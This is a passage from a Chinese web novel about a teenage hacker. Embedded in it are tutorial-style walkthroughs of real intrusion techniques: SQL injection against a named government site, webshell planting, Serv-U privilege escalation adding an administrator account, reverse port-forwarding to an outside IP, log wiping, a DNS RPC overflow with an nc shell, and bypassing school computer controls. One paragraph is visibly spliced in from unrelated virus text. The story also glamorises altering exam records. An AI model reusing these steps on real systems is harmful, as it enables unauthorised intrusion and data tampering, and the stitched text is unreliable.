危险漫步很有默契地说:“割席断交一直以来被人流颂,人们觉得志不同道不合,不建立共同的思想基础便很难成为朋友。我不这么认为,我认为朋友而言,最重要的一定是信任,那种无论身处何地也不会背弃的信任。人各不同,每个人都不一样的性格,不一样的爱好,这很正常。如果按照要求自己一样去要求朋友,那才是过分。朋友间的支持起于理解,继而支持。而不是进行道德绑架,然后扭曲的支持。你若喜欢,直接做便是。我本不爱吵闹,或许在人们眼里有些不近人情不是?”

整个下午,人群都没有散去,小虎的母亲坐在灶房里啜泣,虽然无人伤亡,不过拾掇完散落一地的碎砖,约莫要耗尽他们家半年的积蓄。焦黄的枯草夹杂在残砖裂瓦中,这种残忍的盛况,再也没见到过。


 第四章  林雨生(二)


毕业考的最后一门是微机。考试内容为画图,只要画得别太惨,老师都会给你满分。危险漫步依旧保留着他的聪明,不露山水。他的画和班里同学差不多,蓝天,飞鸟,红太阳。太阳只有一个,飞鸟各不相同。危险漫步的飞鸟里,附带了一个不起眼的小程序,它像羽毛一样轻盈,显示不出重量,微机老师轻易别骗过。

羽毛蛰伏里两天,原形毕露。它露出凶恶的獠牙,通过它,危险漫步入侵微机老师的主机,接着进入学校主机,修改几个小小的数字。危险漫步如愿以偿地进入了市里最好的初中,他看中的不是惹的其他学校眼红的升学率,不是优越的师资,而是前年学校新建的计算机房。有时候,林雨生很想问问危险漫步,他说的每年开一次机是什么意思。可惜,危险漫步从没给他机会。夏天,两个十二岁的孩子整日混迹于网吧,临时卡高额的费用不是一个孩子能承担得起的,但是网吧对林雨生而言有很大的吸引力,新鲜,自由,刺激……

危险漫步变着法子,不断地给临时卡加钱,林雨生眼前眼花缭乱的数字与代码,换来一天的网吧时光。网吧和家里完全不同,在网吧,可以肆意妄为,你在虚拟的世界做什么,也不会有人管你。林雨生享受着家里无法想象的自由,各种新鲜的东西摆在眼前,像一块巨大的蛋糕。游戏,笑话,亦或是少儿不宜的图片、视频。

林雨生乐不思蜀。

他身旁的危险漫步,面对的却是数不尽的数字,英文。他看不见数字背后的东西,所以他觉得枯燥,所以,危险漫步更引起了他的好奇心。他会忍不住问危险漫步,危险漫步却总是说:

“等我需要让你明白的时候,你自然会明白。现在,你只需要快乐得享受你的午餐。”

林雨生一阵扫兴,但很快又投入自由的烈火中。

忙完手里的工作,危险漫步心血来潮,决定攻击下教育局的网站,现在教育事业让危险漫步颇为失望,危险漫步决定给他们一个小小的教训。

危险漫步招呼旁边的林雨生,道:“雨生,想不想入侵教育局的网站?”

林雨生一听来了兴趣,他放下手里的游戏,“怎么入侵?”

危险漫步笑了笑,“我现在就入侵给你看,你看着就是。”

东洲教育局网站使用的是ASP.随便点了个链接,习惯性的在后边加了个“′”,结果提示“处理URL时服务器出错。请与系统管理员联系。”看来在测试过程中又发现了一个奇妙的现象:运行被感染的文件后,第一次它会释放病毒,但是以后它的图标就会恢复正常井且不会再释放病毒了。利用这个特点,危险漫步一个程序一个程序的运行,这样运行过的EXE程序就没有病毒了。

一个小时过去了,只搞了一半的感染文件,虽然很累,但看到起死回生的文件,这点辛苦根本不算什么。

可是在继续搞的时候,危险漫步回来看了一下曾经运行过的没有病毒的程序。令他郁闷的是那些EXE图是使用了某个防注入系统。

使用ID扫了一下,但也没有发现注入点,有时候,很多人看到没有注入点可能就会放弃了,其实不然,方法还有很多,不能轻易说放弃。

危险漫步见没有注入点可以用,就试着看看他的后台。使用ID扫出了几个后台,打开一看,原来对方使用的是Power3.5l(也就是动力系统)。

危险漫步试着使用默认的用户名admin以及密码admin888来尝试登录,提示密码错误。想来管理员也不会太傻。

注入没辙,默认密码又不对,危险漫步一时间竟然有些不知所措。过了一会儿,他突然想到MY动力3.5l以前自己曾架设过,或许可以下载默认数据库。因为MY动力系统的数据库文件名超级长,很难记住的,因此危险漫步到网上下载了一份Power 3.5l。很快就找到了默认的数据库路径Database\adsfkldfogowerjnokfdslwejhdfsjhk.mdb。的确很长。要不是下载了进行查看,谁能记得住这么长的名字。危险漫步在浏览器地址栏是提交进行下载,很幸运的弹出了下载窗口。

管理员虽然使用了防注入程序,但是却没有更改数据库的路径。打开数据库,找到Admin表段,发现只有一个用户fxysonic,相必就是那个超级管理员了。

马上把密码拿到md5在线查询网站上去查,顺利的得到了密码明文,然后就是登录后台。

再一次见到了MY动力的后台,危险漫步就动手了。首先使用空数据库,就是刚才下载的那套Power系统,只留一个Admin表,其余的都删掉。然后备份一下数据库,记下地址。

其实目的是过会儿要恢复目标站的数据库。在添加文章那里把那个改过后的数据库文件改成jpg的后缀进行上传,当然,还要记下地址。

接下来,恢复数据库。在地址栏里填UploadThumbs/2007829223819242.jpg,也就是刚记下的路径,然后再备份就会出现新的登录框了。

版权信息那里没有字符限制,可以传一个类似小马的东西,危险漫步在本地测试,切实可行。继续回到目标站点,找到版权信息。把那里替换成如下代码。

然后进行保存。

这时候不能跳转任何页面,直接在IE地址栏内将acimin/Admin_Login.asp替换成inc/config. asp?xiaoxin=520,为什么呢?这是因为在上面版权信息里的代码是一段发送程序,利用inc/config.aap相关文件信息。写入这个页面之后会发现得到一个类似于小马的后门。在上面填入ASP木马代码,下面则写上路程。然后点OK,直接在inc目录下就会发现了我们上传的大马1.asp。

至此,网站就已经成功搞定了,方法对于很多MY动力系统都非常管用。其实,拿下这类网站并不难,主要是为了开拓思路。

危险漫步问林雨生怎么样,林雨生摇摇头。显然,入侵和他想象中的不一样,他知道危险漫步是成功了,不过总觉得还少了些什么。危险漫步似乎看穿了林雨生的心思,道:“我可以把教育局的网页篡改,不过这样很危险,会遭到网监的追查。等我以后技术再高上一截,自然可以办到。怎么样,想学么?”

林雨生摇头,又点头。危险漫步笑:“学计算机技术,不是要你四处去入侵。我会教你,不过,不是现在。”

说完,危险漫步计算机屏幕上又出现大串大串的数字和英文,林雨生一头雾水,继续刚才的游戏。

看着林雨生在电脑前对着游戏打打杀杀,危险漫步忽然觉得这样不痛不痒地入侵个教育局网站没什么意思,刚好手边的杂志上有个台湾政府的网站,危险漫步决定就拿他开刀,顺便看看台湾同胞的网站安全做得如何。

既然目标已经确定,那么接下来就是使用工具扫描注入点了。对于黑客初学者们来说,使用工具还是比较必要的。扫描注入点,自然首选ID。危险漫步打开ID,单击扫描注入点,然后再在检测网址栏中输入目标网站的网址,在单击右边第一个红色的小按钮,ID就开始自动扫描注入点了。

很快便出现了几个结果,然后在工具下面的“可用注入点”框里全部以红色的链接醒目的列了出来。在这些链接上单击右键,选择“注入检测”就会进入到检测界面。

单击“检测”按钮,得出结果:注入类型为mssql数据库显错模式,注入权限为db_owner。

危险漫步想了想,遇到这种情况,一般可以尝试使用log备份来得到webshell,不过前提是要知道网站的绝对路径。接下来就要利用ID的列目录功能尝试找到网站的根目录,“相关工具”菜单里的第一个按钮目录查看,但是列了半天,居然没有找到w e b目录。既然这样不行就先猜解下表名,列名。

危险漫步再次返回到注入检测页面,单击检测表段,检测出来后会发现tbladminusersp这个就是他的管理员表段了,好双击表名就开始检测表名了。检测出来后得到两个表名login id和password分别为管理员登录用户名和密码,至此已经通过注入顺利得到了管理员用户名和密码。

接下来就是找到后台登陆进去。使用ID的管理入口检测扫描了一下,发现没有把后台扫出来。没办法,只好手工猜解。在url后面加个manage,成功的跳转到了管理登录页面。

使用得到的用户名和密码顺利的登录了进去,危险漫步在里面看了看,虽然有个上传附件的地方,但是发现不能直接上传asp文件,其他可执行(如asa,cer,htr之类的)后缀也不能上传。测试抓包上传也失败了,后台好像利用不了,现在似乎没有什么办法可以继续入侵下去了。

危险漫步继续在后台里转,突然发现了一个很吸引人的地方——网站空间设定。最吸引他的还是那个“浏览文件夹”。

电光石火间,一个念头一闪而过。危险漫步打开该功能,发现了让人非常期待的东西,他网站的根目录发现了:c:\inetpub\wwwroot\digital\newweb\。

居然会在c盘,也是万万没想到啊。有了web路径,注入权限又是db_owner,就可以试着通过log备份来得到一句话木马了。

当然还是老办法,先行使用getwebshellah56bug大众版进行备份。注入点栏填入扫描出来的那个注入点:http://www.digitaldivide.nat.gov.tw/preferential_more.asp?id=97,数据库填cf01(就是ID检测出来的当前库),web路径填c:\inetpub\wwwroot\digital\newweb\hack.asp(要带文件名),木马代码默认的就可以了(ah为连接密码,可以改动,危险漫步改为了cmd),那么到底是数字型还是字符型就要看ID检测的结果了,如果看出是数字型的,那么就选上数字型。接着开始从第一步点到第六步,但不能太快,一般以返回注入点页面后为准,就是返回了一次注入点所在的页面再按下一步,就可以成功备份出一句话asp木马了。

文件尾部出现了你“execute”,大致的意思就是运行出错,类型不匹配一类的,但是同时这也就说明了已经成功备份出了一句话asp木马。接着就使用一句话木马客户端进行连接,连接成功,成功得到返回的目标网站的环境变量信息。那么接下来再次上传一个asp站长助手增强版。其实并不一定要先传小码马后传大马这样的顺序,直接传大马也是可以的,只要服务器允许上传就可以了。

webshell总算是顺利拿到了,不过危险漫步依然不太满意,他决定继续下去,拿下它的服务器权限。有了webshell,只能说是事半功倍。不过,提权前一般要先看看都开了哪些服务,尽量多的得到一些关于服务器的信息。使用asp站长助手增强版执行,按“net start”命令,发现拒绝访问。因为权限不够,不能访问系统目录下的cmd.exe。服务器上原有的cmd.exe不能使用,于是危险漫步上传了一个从2003系统中提取出来的cmd.exe,上传到web根目录下。在“shell路径”里填上cmd.exe文件所在目录:c:\inetpub\wwwroot\digital\newweb\cmd.exe,勾上wscript.shell,再执行“net start”命令,这次终于有反应了,成功返回服务开启信息。

但是危险漫步悲伤的发现,他还是没有什么可以提权的服务。虽然pcanywhere host service 和terminal services这两个挺讨人喜欢,但是因为目前还没有权限,所以并没有办法直接使用。

执行“net user”后发现有aspnet这个用户,说明对方系统支持asp.net。于是危险漫步上传了一个aspx木马,但是访问后发现根本不能使用,看来没有开通对于asp x的支持,真实可惜。

危险漫步决定用serv-u提权。跳到程序目录发现安装有serv-u,这对他来说可是一个好消息。紧接着上传goldsun写的serv-uasp提权木马,准备添加一个用户名为hackest并用户并添加进管理员组,命令格式为“cmd/c net user goldsun love /add & net localgroup administrators goldsun /add”,可是这个提权木马有个毛病,就是无论成不成功,都会直接显示成功。事实上,在这个网站的提取过程中并没有成功添加用户。

危险漫步非常郁闷,因为权限暂时还没有办法提上去。明明装有serv-u的,但是却提不了权。危险漫步觉得是不是管理员把默认的连接密码修改了,他扫描了一下21端口,发现serv-uftp版本居然是2.5,危险漫步巨冷,居然会是2.5版本。他之前还从来没有遇到过这么低版本的serv-uftp。

危险漫步顺手在google一个上搜索了关于2.5版本的提权资料,发现只有几个链接,而且还都根本解决不了问题,有些还是01年的资料。看来这个2.5版本的的确是太老了。

台湾同胞如此怀旧,serv-u提权的asp木马频频失效,提权陷入了困境,危险漫步郁闷透了。

危险漫步又跳转到serv-u的安装目录c:\program files\serv-u试试,发现2.5版本的serv-u果然和平时见到的高版本serv-u有很大的不同,文件也少了很多。看来看去就像一个ini文件,serv-u.ini这个应该就是ftp配置文件了。

危险漫步打开这个文件,惊奇地发现ftp密码居然是明文存放!不过却没有对这个文件的编辑权限,看来要想添加一个ftp用户是实现不了的。他把安装目录里的所有文件下载回本地,打开后发现是英文版的,但是没有找到类似6.0版本那样的用户权限分配设置。

危险漫步没管那么多,赶紧使用得到的用户名和密码连接,发现能够正确连接上。而且他还发现个别ftp用户拥有执行权限!这才是最重要的!看来提权就要靠它了!

怀着激动的心情,危险漫步喝了口水,继续操作。

要想实行执行命令的话就要在cmd下连接登陆才行。于是他退出flashfxp,在cmd下连接登录进去,发现成功登陆(230 user logged in,proceed.)。他再次尝试自行添加用户命令quote site exec net user hackest hackest123456,却提示“501 cannot exec command line <error=2>.”,可恶,居然执行不了!

危险漫步又上传了一个net.exe到网站根目录下,然后再执行quote site c:\inetpub\wwwroot\digital\newweb\net.exe user hackest hackest /add.这一次提示成功了(200 exec command successful <tid=33>.),也终于发现有hackest这个用户了。接着当然就是把这个用户添加进管理员组了,执行quote site exec localgroup administrators hackest/add也提示成功了(200 exec command successful <tid=33>.)。再在webshell里执行“net user hackest”,发现此用户已经在管理员组了。

用户已经成功被添加了,最后的事情就是连接登录了。可是当危险漫步正准备使用3389连接时,却发现又连接不上,这到底又发生了什么?难道是远程桌面连接端口被改成别的了?

仔细检查后危险漫步发现端口的确是3389,那么连接不上的原因就只有一个了——被防火墙拦住了!当然,还有pcanywhere,连接端口是5631,虽然在c:\documents and setting\all users\application data\symantec\pcanywhere目录中下载了它的*.cif文件,又使用pcanywhere passview v1.11得到了用户名和密码,不过一样也是连接不上。

不过,这属于小问题。解决的办法就是给它来个端口转发。因为一般防火墙从外对内的连接看得很死(比如危险漫步连接服务器),但是对由内向外的连接就不那么严格了(比如由服务器连接危险漫步),这样的连接防火墙一般都会放行的。

危险漫步以迅雷不及掩耳之势的速度上传了一个lex.exe到网站的根目录下,然后使用f tp执行:quote site exec c:\inetpub\wwwroot\digital\newweb\lex.exe -slave 219.135.10.7 51 127.0.0.1 3389。命令的意思就是把服务器上的3389端口连接数据转发到远程主机的51端口,就是转发到危险漫步这边的51端口了。然后在本地运行,端口的数据转发到2011端口,这样就实现了连接本机2011端口等于连接远程主机3389端口的目的了。最后再使用远程桌面连接器连接“127.0.0.1:2011”就可以连接上对方的服务器了。

危险漫步长吁一口气,他已经拿到了服务器的最高权限并且完全控制了这台服务器。最后的工作当然就是就是把上传的工具删除,清理一下日志。

危险漫步和林雨生初中时在不同的班级,两人联络减少。中考过后,危险漫步故技重演,上演一套魔术戏法。入侵市教育局数据库比入侵小学电脑难得多,靠一只小鸟,自己在家里远程操作远远不够,不过,危险漫步早已不是当年的危险漫步了。

凭借一张童叟无欺的脸,危险漫步混过了看门老大爷。

把笔记本和教育局的线网连接起来,找到数据库,危险漫步只用了87秒。危险漫步心仪的高中在古店,数据改好后,又把另一个人的成绩改了,退了出来。

走出教育局,危险漫步漫步在东洲的街道上。天空中飘摇着小雨,危险漫步无事可做,忽然想起已经很久没和林雨生联系了,就打了林雨生的电话,两个人也没共同的去处,每次出来,除了网吧还是网吧。这一次,危险漫步换个地方练手,目标是学校的机房。

中考已经结束,初三的学生忙着怀念初中时光,此番央求老师再进机房,并不是什么难事。

不过,千算万算,危险漫步还是漏算了一条:学校的机房已经全部重装了系统。这也不能怪危险漫步,初三的他已经整整一年没摸过学校的计算机了。

具体情况是这样的:首先是全盘还原,使用的是联想惠盾硬盘保护系统,然后是USB设备全部被禁用,系统默认登录的是一个student用户,权限很少,任务管理器也被禁用了,任务管理器也被禁用了,注册表无权修改,还从注册表中禁止了一些程序的运行,比如QQ、一些游戏安装包、冰刃等等。这次的机房之旅真是悲伤,危险漫步决定自己动手,找回属于自己的自由。

危险漫步首先想到了新建管理员用户的方法,试了一下,显示拒绝访问,应该是默认登录的student用户没有权限来执行这样的操作,就连tasklist、ntsd等命令也没有权限运行。

危险漫步想,既然本地文件没有权限执行,那就从网上下载回来使用,可偏偏连外网也都上不了。要想上网,就必须先和老师打招呼,老师同意了才能开通网络。

危险漫步打开计算机课的改卷程序,如果学生的作业全做对了,就会跳出一个cmd窗口,标题是netsh,没有明文命令。危险漫步到网上搜索了一下,netsh应该是一个修改DNS服务器的命令,于是他开始着手破解这个程序。改卷程序的图标是VB的默认图标,所以他想到了使用vbexplorer载入程序,载入后首先查看字符串,结果直接看到了Commandl.click下的一串字符“netsh int ip set dns本地连接static 222.172.200.68 primary”,这个就应该是打开网络的命令了。

危险漫步试了一下,结果成功的连接上了网络,但是没过几分钟,电脑就自动重启了,没想到还留了一手。危险漫步猜这应该是利用了一个程序来检查网络连通情况,如果连通了就执行重启命令。不过,为什么老师的改卷程序在开通网络后电脑就不会重启呢?有可能是结束了那个检查网络的程序吧。

危险漫步开始查找那个用来检查网络的程序,结果在启动文件夹里找到了一个名为gj.exe的vb程序。

连接网络后双击运行gi.exe,电脑果然重启了。那么改卷程序又是怎样结束gi.exe呢?taskkill、ntsd等命令都没有执行的权限,无奈之下,危险漫步只好在system32目录下闲逛,验证了taskkill.exe、tasklist.exe、ntsd.exe命令,都没有执行权限,继续闲逛着,无意间发现了一个和taskkill文件名非常相似的tskill.exe文件,危险漫步想这会不会是老师改了名字的taskkill呢?

在cmd下使用taskkill的命令格式运行了一下tskill.exe,果然提示说没有找到进程,他又执行“tskill/?”查看了一下,不太明白,但应该不是taskkill,于是他到网上搜索了一下,了解到这是一个系统命令程序,结束进程时不用加.exe,他重新试了一次,成功的结束了gj.exe的进程,现在,危险漫步终于可以做到开机就能自己连接网络了。

其实,如果是正在上计算机课的话,那么还有方法躲避老师的追踪的。下载“追影虚拟桌面”,运行以后按下Ctrl+l隐藏界面,然后按Ctrl+左(或者“下”、“右”)跳到虚拟桌面上,这样老师在广播的时候,学生那里就不会被锁屏,就可以继续自由活动了。要想听课的话按Ctrl+上就可以了,但是必须要等老师结束广播以后才能自由活动。

不过,现在没有老师讲课,越狱成功之后自行活动便是。

危险漫步伸了一个大大的懒腰,外面的雨已经停了,天色也愈发昏暗。他谢过老师,吹着小调离开了机房。

两周后,中考成绩下来。危险漫步如愿进了古店中学,拿到录取单的那一刻,他竟像几年前的汪青蓝一样,开始觉得生活有些无聊。


第五章  古店


危险漫步出发的时间提前了一周,他把东西放在宾馆后,就去了网吧。新生没有几个,网吧里的年轻人除了高二高三的,便是社会青年。这群人在学校的时候不爱学习,也没有自身的打算,因为各种各样的问题离开学校,没有能力又吃不得苦,还整天抱怨命运对自己不公平,总觉得自己不招人待见,是社会上彻彻底底的渣滓。除过他们主动挑衅别人,换得一些火花外,他们完全就是个隐形人。废物,就是为他们而创造的词。他们在社会上糊混。见到软弱好欺的学生,不是找茬就是要钱,或许这样他们能体会到一种成就感吧。

一群废物盯上了危险漫步。目的是为了危险漫步脚上的新鞋。The Answer 3/18,锐步公司为艾弗森打造的一款纪念版鞋。他们看到的,只是新鞋。挺漂亮的新鞋。

理由更加可笑,他们一眼就看出危险漫步不是本地的人——他们是,即所谓,地头蛇吧。

危险漫步经过时,一个把头发染得五花六道的人冲危险漫步大声叫嚣着,先用方言,啰啰嗦嗦说了一大堆,待危险漫步停下脚步,他便用普通话,说危险漫步踩到他的鞋子了。

危险漫步低头看了眼,知道自己完全不可能踩到他。五花六道男的电脑屏幕显示的一款赛车游戏,“极限狂飙”。危险漫步冷冷地说,“极限狂飙”是么,废物。

五花六道男以为危险漫步质疑的是他的技术,勃然大怒,他愤怒地表示在整个古店,这款游戏他的成绩是最好的。如果不服气,可以来抢七。

所谓抢七,就是两个人比赛,先赢七局者赢。

危险漫步点头,同意了。

五花六道男脸上露出猥琐的笑容,说需要带彩金。

危险漫步依然同意,并问五花六道男需要多少彩金。

五花六道男说一万,危险漫步漠然地点了点头,说等一个小时后比,然后拉上衣服后的兜帽,走到一个角落坐下。

五花六道男边上的一个光头男冷笑着说:“选那么一个偏僻的位置,等下输的难看溜都溜不掉,呵呵。”

危险漫步并不理会他们的窃窃私语,他只要记得五花六道男的机子是24号就行。

一小时后,比赛开始。对五花六道男而言,危险漫步和他比极限狂飙的确有点找死的味道,他定了一万的彩金,充分说明了他的自信,不过危险漫步轻易的答应了,他心里反而有毛毛的。他反复推敲,否定危险漫步车技比他好的想法,他极限狂飙在市里的确数一数二,市里哪些高手他也基本知道。所以,他认定危险漫步是一名富二代。

“年少轻狂的富二代,那样刚好。”五花六道男想到这里,嘴角又露出猥琐的笑容来。

第一局。比赛开始后,危险漫步装作敲击键盘的样子,以免引起他人的怀疑,而控制他屏幕上赛车的人,是这个城市另一头的林雨生。危险漫步知道林雨生会这款游戏,打电话说明情况,游戏端全由林雨生操作。屏幕右下方有个小窗口,那里显示的是五花六道男的游戏窗口,每当他过弯道的时候,危险漫步就轻轻按“后退”键,破坏他过弯。释放氮气或者飞跃等技术点的时候,也可以稍加破坏,影响其速度。

一比零,五花六道男胜。危险漫步小小试水,确认情况,却并不发动攻击。

丛里溪边,一条眼镜蛇高高昂起,他吐着蛇信子,对着一旁的硕鼠发出嘶嘶的声音。

五花六道男嚷嚷着没手感没手感,第一个赛道“天街”是他最拿手的赛道,一般来说,在这个赛道他是不会出现什么意外的。跑到终点才发现比平时成绩慢了五秒,他有点意外,尽管赢了,还是有些忌讳。 

第二局,危险漫步险胜。

网吧里的对决屡见不鲜,人们并不会因为这场对决而耽搁了自己的事情。

另一个角落,一个同样带着帽子的人聚精会神地盯着自己的电脑。在网吧上网的人,多半是游戏,少数看视频,更少数学习。这个戴帽子的人却在探索windows dns服务溢出漏洞。

大概在前一段时间,在某国外的黑客网站上率先公布了最新的windows dns服务啊PC接口远程栈溢出漏洞的攻击程序,接下来的几天里,针对该漏洞的攻击测试程序,就一共公布了五个。对于戴帽子的人来收,这是一个巨大的惊喜,因为这是自去年ms06-040漏洞公布后,针对windows系统有一个非常严重的远程溢出漏洞。

漏洞的简单介绍如下:windows dns服务器的ipc接口在处理畸形请求时存在栈溢出漏洞。Lookup zone treenodefromdottedname()函数使用固定的本地缓冲去转换name_convertfilenametocount name()字符串,这个字符串中可能包含有反斜线八进制字符,尽管在写入缓冲区的时候执行了一些边界检查,但入侵者可以采用包含有多个反斜线的字符串来绕过检查,从而导致栈溢出。远程攻击者如果向有漏洞的系统发送特制的rpc报文的话,就可以触发这个溢出,导致以dns服务的安全环境执行任意指令(默认系统权限)。这个漏洞主要影响windows2000 sp4以及windows2003 sp0-sp2的版本(可以远程溢出windows2003)。

再看一下关于漏洞测试程序的编译问题,给出的一共有五个文件,分别是:dissasembles.txt,dnsxpl.acf,dnsxpl.ldl,makefile和dnsxpls.c。虽然也是c程序,但出错。其实事实上这个程序应该使用nmake来进行编译。具体的编译格式就是nmake/f makefile,很快的dnstest.exe就会编译出来了。

这一边。

第三局,危险漫步险胜。

“妈的!”五花六道男恶狠狠地捶击键盘。他的确恨这个键盘,每次到关键时刻总给他制造些麻烦。或许是因为从未下这么大的赌注吧,有些压力,所以每个赛道都跑不出真实的水平。他安慰着自己,嘴里不停地念着,平常心,平常心。

第四局,五花六道男胜。二比二。

眼镜蛇露出獠牙,向硕鼠飞去。

第五局的赛道是“特利亚夜晚的海滩”。林雨生最擅长的图,整个比赛中,危险漫步只把键盘按下去三次。在五花六道男看来,这是他跑的最好的一把,真实的水平终于发挥出来了。但他依然输了。额角巨大的汗珠滴了下来。他开始怀疑危险漫步是否是其他省市来旅游的高手。

第五局,危险漫步胜。三比二。五花六道男的心濒临崩溃,他的水准又一次丧失,为什么?他问自己。没人给他答案。如果他知道危险漫步三年后的绰号,也许是一个很好的提示。

可是人从来没有预知未来的能力。

第六局,危险漫步胜。四比二。

另一边。

戴帽子的男生运行程序,看看溢出程序的使用格式是怎么样的。格式其实非常简单,一共有两种格式,一种是dnstest -h 127.0.0.1,这个是用于本地溢出的,另一种就是dnstest -h 远程ip地址 -t 系统型号 -p 连接端口。

Dows2000和2003系统都开放了dns服务。要如何去寻找开放了dns服务的主机呢?dns服务所使用的端口号是53,可以通过端口扫描工具扫描53和445端口(溢出程序与远程主机是通过445端口建立的连接)来寻找测试目标。

他打开superscan,点击右上角的端口配置按钮,然后在端口列表中找到53(domain name server)和445(mierosoft-ds)端口,双击就会选中它们了。以后,只想使用superscan扫描特定端口的话,当然也可以这样使用。然后单击“ok”按钮,superscan就会弹出一个小窗口,提示列表已经更改是否保存。点击是,保存成一个文件,然后再点击确定,就会回到superscan的主界面了。在扫描类型(scan type)中选择“所有列表中选择的端口”(all selected ports in list),输入要扫描到起始地址就可以了。

他决定先测试本地溢出按照使用的格式,输入dnstest -h 127.0.0.1运行,程序最终会停在“now try connect to port 4444”,提示尝试连接4444端口,运行nc,连接4444端口,如果连接成功的话,就会得到一个shell了,而且还是系统权限!

这一边

第七局,五花六道男胜。四比三

第八局,危险漫步胜。五比三。

五花六道男换了机子,坐在了旁边光头的位置。

第九局,五花六道男胜,五比四。

另一边。

他继续尝试远程溢出,可以使用dnstest -h 192.168.0.123 -t 3 -p 445的格式来进行测试。

不过,该漏洞测试系统有不完善的地方——在测试的时候,对dns服务只响应一次,也就是说测试一次,对方的dns服务就会挂掉一次,必须要重新启动系统后,对方的dns才会恢复正常。

至此,漏洞测试已经结束,他抬手看了下时间,时间长不多刚好。他拿出U盘,拖出工具清理工作日志,下机向比赛的角落走去。

这一边。

第十局,危险漫步胜,六比四。

眼镜蛇快吞到硕鼠的时候,硕鼠忽然消失,眼镜蛇的一侧闪电似的出现了一条眼镜王蛇,转眼之间,眼镜蛇已成为眼镜王蛇的腹中食。

五花六道男一行人落荒而逃。

在后来与林雨生的电话里,危险漫步坦诚,如果当时他们中来个人监视他,那么他只能偷偷用U盘造成全网吧断网,然后再找机会开脱。如果他们最后输了死赖着不给钱,危险漫步除了耍耍嘴皮,也没有什么好的办法。

“不过,即使重演一百次,事情还是一种结果。什么样人做什么事。历来如此。”

危险漫步下机准备回去,却被人拦住去路。

挡在他前面的是一个面容清秀的男生,他低着头,带着帽子,双臂展开。

危险漫步问:“什么事?”

那人坏笑着,阴阳怪气地说:“技术不赖嘛。”

危险漫步:“把握好漂移的时差,尽量贴着弯道。岀弯时释放氮气的时间。把握好基础的技巧,是赢得比赛的关键。”

“你说笑了。他们虽然没反应过来,我却是望得清清楚楚。你说的漂移时差、释放氮气等技巧,是让对手键盘失灵吧?而非,己方做得登峰造极。”

危险漫步并不承认,那人只好叫危险漫步把五花六道男的电脑打开,恢复其数据,再看刚刚比赛的录像。

危险漫步点头同意,绕过他准备找网管恢复数据。他后退几步,再一次拦住危险漫步。

“不用那么麻烦,恢复数据的事,对你来说不是很简单么?”

危险漫步摇头,那人也不在意,仍然伸手去开五花六道男的电脑。“如果你坚持不会,那恢复数据的任务交给我来完成好了。”

危险漫步拦住他,“不必了。”

他回过身,看着危险漫步。四目相对,沉默许久,最终还是对方先沉不住气。

“算了,先自我介绍吧。我叫萧让,古店中学,高三。”

“危险漫步。然后呢?”

“我无意与你为敌,相反,我想邀请你与我合租。你住校会很不方便的,对吧?”

“我没有听懂。”

萧让笑:“哪里没懂,我逐条解释好了。”

沉默。

危险漫步:“你怎么知道我是高一的新生?”

萧让:“敏锐的观察加上大胆的推测,可以了解很多旁人觉得不可思议的东西。职业只是入门。平常人看人只看脸面,若是穿得花里胡哨,人们便会注意几眼着装。如果我仔细观察头发、衣着、手、鞋子、饰品得出的结论,便可以得到常人觉得不可思议的答案。”

“可以。那么,你可以说出你的目的了么?我没有什么可说的,如果有,那就是你跟本不会数据恢复。”

萧让显然愣了下,继而笑。从开始,他的了脸上就带着各种各样的的笑容。他准备开电脑的时候,过分自信的笑容反而暴露了他的心虚。奇怪的是,危险漫步到现在才肯戳穿他。

萧让长叹一声,只好道出缘由:他想和危险漫步学习计算机方面的技术。

危险漫步伸手示意萧让把路让开,他说道:“你要学习技术,可以报名专业的学习班。再者,我也没有什么技术可以教你。”

萧让会过头,严肃地说:“你可以。看得出,你是一名黑客。”


第六章  黑客


2006年末至2007年初,中国几百万台电脑陷入瘫痪,症状多为屏幕上出现一只烧香的大熊猫。

病毒肆虐网络,无数人从安全地带惊醒,更有许多人从此知道了黑客这一名词。萧让,只是其中之一。

2006年是萧让比较落魄的一年,父亲的公司周转不济,举步维艰。哥哥不听全家人的劝阻,执意要去服兵役,家里天天吵架,风雨飘摇。在这影响下,萧让的成绩一落千丈,而他,正面临着升学。

烦躁的情绪碾压着萧让,他每天除了功课,就是和网络上的一个朋友倾诉着自己的烦恼。

对方的网名叫玩笑,萧让不知道他的真名,只知道他是一个男生。当然,电脑另一头的玩笑也不知道萧让真实姓名。他们两个同学聊天软件,互相诉说各种发生的种种不开心的事。

玩笑那年上高一——一个烂高中。他从小热爱木雕,因此成绩一直很烂,他有自己的梦想——成为一名雕塑师。高中的时候,他的作品已经有些艺术色彩。父母对他的梦想一直呈反对态度,高中三年尤为重要,所以他们逼迫玩笑放下手里的刀木。

“我的母亲要和父亲离婚了,她说如果父亲再管不住我就和他离婚。我的女朋友也和我分手了,我本来想等完成她的生日礼物再告诉她我梦想的事,可是,在我刻了一半的时候,她提出分手了。在她眼里,我只是个不学无术,一塌糊涂的男生。我觉得,我的生活就像一个玩笑。”

两个失意的人成了朋友,直到2007年1月3日。

那天是元旦节最后一天假,萧让的哥哥还有三天就要走了,父母没忙着收拾准备送行,倒是忙着更凶猛的吵架。到了年关,讨债的人堵到了家门,争吵暂先搁到一边,一家人忙活另一场闹剧。核心人物,萧让的父亲坐在沙发上,抽烟,半年来,他从软中华抽到了大前门。望着不断咳嗽的父亲,萧让无奈地从家后门溜走。大街上熙熙攘攘,热闹非凡,大商铺门口花样繁多的活动,不入流的临时主持人在临时搭建的舞台上唱着破音的歌。

没人在乎他的音破得多惨,只要快乐。

饶了几圈,还是烦躁。萧让觉得他和周围的环境一点很违和,想做点什么,强乐还无味。

折进网吧的时候,天色已晚,街灯亮得比平常灿烂些。玩笑告诉萧让,他的礼物做好了,虽然,他并不打算送出去。

两个各自说一些安慰的话。当人们人把苦恼的事情说出去,仿佛苦恼就会解决一样。安慰的句子起不到任何作用,不过内心的忧郁却随之减少。 

突然,显示屏上的画面变成了一个熊猫,接着网吧里发出各种“咦?”“啊?”“唉?”等声音,接着响起一片谩骂声。

网吧的管理者出来维护秩序,萧让等了一会儿,才知道是网吧中了病毒。他落寞地走出网吧,却又不懂可以去哪儿。

后来病毒被杀,始作俑者李俊被捕,沸沸扬扬的熊猫烧香病毒事件终于过去。萧让发现从网吧中毒那天后,玩笑就再没上线过,发给他的消息也一直没得到回复。

他开始为这个素未谋面的朋友担心起来,可是,他对他一无所知,只有一个网名,仿佛在告诉他,生活只是一个玩笑。

时间的巨轮从未停止,无论前方是多大的风浪。后来,萧让进入古店中学,一个既不好,也不差的学校,很普通,唯一的亮点是一年前他搬入新校区,增里不少实验室。

萧让的哥哥留在里部队,很少回家。他父亲的公司挺过难关,家里终于平静了些。

